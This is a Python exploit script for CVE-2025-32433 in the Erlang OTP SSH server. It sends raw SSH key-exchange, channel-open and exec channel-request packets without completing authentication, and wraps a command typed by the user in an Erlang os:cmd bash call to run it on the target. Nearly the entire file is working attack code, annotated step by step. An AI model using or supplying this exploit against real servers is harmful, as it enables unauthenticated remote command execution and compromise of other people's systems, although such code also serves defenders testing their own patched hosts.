import argparse
import socket
import struct
import time

def parse_arguments():
    """Return the parsed command-line options as an argparse namespace.

    Recognized options:
        -d / --debug   print the raw server response in hex
        -t / --target  host to connect to (default ``127.0.0.1``)
        -p / --port    TCP port to connect to, parsed as int (default ``2222``)
    """
    cli = argparse.ArgumentParser(
        description="Exploit for CVE-2025-32433 (Erlang OTP SSH server).",
    )
    cli.add_argument(
        "-d", "--debug",
        action="store_true",
        help="Print raw response in hex format",
    )
    cli.add_argument(
        "-t", "--target",
        default="127.0.0.1",
        help="Target host (default: 127.0.0.1)",
    )
    cli.add_argument(
        "-p", "--port",
        type=int,
        default=2222,
        help="Target port (default: 2222)",
    )
    options = cli.parse_args()
    return options

def string_payload(s):
    """Encode text as an SSH ``string``.

    The result is the UTF-8 bytes of *s*, preceded by their length as a
    big-endian uint32.
    """
    body = s.encode()
    header = struct.pack(">I", len(body))
    return b"".join((header, body))

def build_channel_open(channel_id=0):
    """Build an unframed SSH_MSG_CHANNEL_OPEN payload for a "session" channel.

    Layout: message byte, channel type string, then three big-endian uint32s:
    sender channel id, initial window size (0x68000) and maximum packet
    size (0x10000).
    """
    msg_type = b"\x5a"  # SSH_MSG_CHANNEL_OPEN (90)
    channel_type = string_payload("session")
    # Packed together; identical bytes to three separate ">I" packs.
    numeric_fields = struct.pack(">III", channel_id, 0x68000, 0x10000)
    return msg_type + channel_type + numeric_fields

def build_channel_request(command="", channel_id=0):
    """Build an unframed SSH_MSG_CHANNEL_REQUEST of type "exec".

    The request targets *channel_id*, sets want_reply to true and carries
    *command* as the exec command string.
    """
    fields = [
        b"\x62",                        # SSH_MSG_CHANNEL_REQUEST (98)
        struct.pack(">I", channel_id),  # recipient channel
        string_payload("exec"),         # request type
        b"\x01",                        # want_reply = true
        string_payload(command),        # command to execute
    ]
    return b"".join(fields)

def build_kexinit() -> bytes:
    """Builds a minimal but valid SSH_MSG_KEXINIT packet.

    Returns the unframed payload; the caller wraps it with ``pad_packet``
    before sending. Fields appear in KEXINIT order: message byte, 16-byte
    cookie, ten name-lists, the first_kex_packet_follows flag and a reserved
    uint32.
    """
    # Encode a list of algorithm names as an SSH name-list (comma-joined string).
    nl = lambda l: string_payload(",".join(l))
    return (
        b"\x14"  # SSH_MSG_KEXINIT (20)
        + b"\x00" * 16  # cookie: fixed all-zero bytes here, not random
        + nl(["curve25519-sha256", "ecdh-sha2-nistp256", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group14-sha256"])  # kex_algorithms
        + nl(["rsa-sha2-256", "rsa-sha2-512"])  # server_host_key_algorithms
        + nl(["aes128-ctr"]) * 2  # encryption: client->server, server->client
        + nl(["hmac-sha1"]) * 2  # MAC: client->server, server->client
        + nl(["none"]) * 2  # compression: client->server, server->client
        + nl([]) * 2  # languages: client->server, server->client (empty lists)
        + b"\x00"  # first_kex_packet_follows = false
        + struct.pack(">I", 0)  # reserved field, always 0
    )

def pad_packet(payload, block_size=8):
    """Wrap *payload* in SSH binary-packet framing (no encryption, no MAC).

    Output layout: uint32 packet_length | byte padding_length | payload |
    zero padding. The padding is chosen so that the whole packet (including
    the 4-byte length field) is a multiple of *block_size*, with at least
    4 bytes of padding.
    """
    padding = block_size - (len(payload) + 5) % block_size
    # The minimum padding is 4 bytes; add another whole block if we fell short.
    if padding < 4:
        padding += block_size
    packet_length = 1 + len(payload) + padding
    length_field = struct.pack(">I", packet_length)
    return length_field + bytes([padding]) + payload + bytes(padding)

def escape_shell_command_for_erlang(cmd: str) -> str:
    """Escape shell command for Erlang.

    Returns an Erlang expression of the form
    ``os:cmd("bash -c '<cmd>'").``, including the trailing period.
    Backslashes and double quotes in *cmd* are backslash-escaped so the text
    stays inside the Erlang double-quoted string literal.

    NOTE(review): single quotes in *cmd* are not escaped, so a command
    containing ``'`` ends the ``bash -c '...'`` quoting early.
    """
    # Backslashes are escaped first so the backslashes added for quotes are not doubled.
    escaped = cmd.replace("\\", "\\\\").replace("\"", "\\\"")
    return f'os:cmd("bash -c \'{escaped}\'").'

def main(args: argparse.Namespace) -> None:
    """Main function to handle SSH interaction.

    Connects to ``args.target``:``args.port`` and sends the following, in
    order:

    1. the client identification string;
    2. a KEXINIT;
    3. a CHANNEL_OPEN;
    4. an ``exec`` CHANNEL_REQUEST carrying a command read from stdin.

    Key exchange is never completed and no authentication request is sent.
    All packets are framed unencrypted.

    Args:
        args: Parsed CLI namespace. The function reads ``target``, ``port``
            and ``debug`` from it.

    Any exception raised along the way is caught and printed instead of
    propagating.
    """
    try:
        # The 5 s timeout covers the connect and every later recv() on this socket.
        with socket.create_connection((args.target, args.port), timeout=5) as s:
            # Note: this message is printed after the connection is already established.
            print("[*] Connecting to SSH server...")
            s.sendall(b"SSH-2.0-OpenSSH_8.9\r\n")
            # Single recv of up to 1024 bytes, assumed to hold the server's identification line.
            banner = s.recv(1024)
            print(f"[✓] Banner: {banner.strip().decode(errors='ignore')}")
            # NOTE(review): fixed delays presumably give the server time to process
            # each message; nothing here waits for or parses a reply.
            time.sleep(0.5)

            print("[*] Sending KEXINIT...")
            s.sendall(pad_packet(build_kexinit()))
            time.sleep(0.5)

            print("[*] Opening channel...")
            s.sendall(pad_packet(build_channel_open()))
            time.sleep(0.5)

            # The command is wrapped as an Erlang os:cmd expression before being sent.
            shell_cmd = input("[?] Shell command: ").strip()
            erl_cmd = escape_shell_command_for_erlang(shell_cmd)

            print("[*] Sending CHANNEL_REQUEST...")
            s.sendall(pad_packet(build_channel_request(erl_cmd)))

            print("[✓] Payload sent.")

            try:
                # At most 1024 bytes are read; the reply is only shown with --debug.
                response = s.recv(1024)
                if args.debug:
                    print(f"[+] Raw response (hex): {response.hex()}")
            except socket.timeout:
                # The timeout notice is printed only when --debug is NOT set.
                if not args.debug:
                    print("[*] No response received (timeout).")

    except Exception as e:
        # Top-level catch-all: report the error instead of a traceback.
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    # Script entry point: parse CLI options and hand them straight to main().
    main(parse_arguments())
